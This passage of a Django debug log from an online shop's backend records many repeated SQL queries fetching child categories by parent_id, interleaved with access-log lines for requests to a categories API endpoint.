BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:37:53,393 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:37:53,396 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:37:53,398 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:37:53,401 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:37:53,403 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:37:53,405 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:37:53,407 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:37:53,410 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:37:53,412 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:37:53,414 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:37:53,417 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:37:53,419 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:37:53] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 02:37:54,833 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:37:54,841 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:37:54,846 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:37:54,849 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:37:54,853 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:37:54,855 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:37:54,858 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:37:54,860 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:37:54,863 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:37:54,866 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:37:54,869 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:37:54,871 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:37:54,873 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:37:54,876 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:37:54,879 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:37:54,882 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:37:54,884 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:37:54,887 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:37:54,889 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:37:54,893 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:37:54,895 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:37:54,898 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:37:54,901 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:37:54,903 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:37:54,906 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:37:54,910 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:37:54,913 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:37:54,915 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:37:54,918 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:37:54,921 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:37:54,925 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:37:54,928 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:37:54,931 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:37:54,934 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:37:54,936 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:37:54,941 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:37:54,945 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:37:54,948 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:37:54,951 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:37:54,953 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:37:54,956 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:37:54,959 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:37:54,963 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:37:54,967 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:37:54,972 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:37:54,976 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:37:54] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 02:37:55,779 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:37:55,787 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:37:55,791 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:37:55,794 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:37:55,797 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:37:55,799 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:37:55,801 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:37:55,803 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:37:55,806 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:37:55,810 utils 4252 140031503103744 (0.000) SELECT 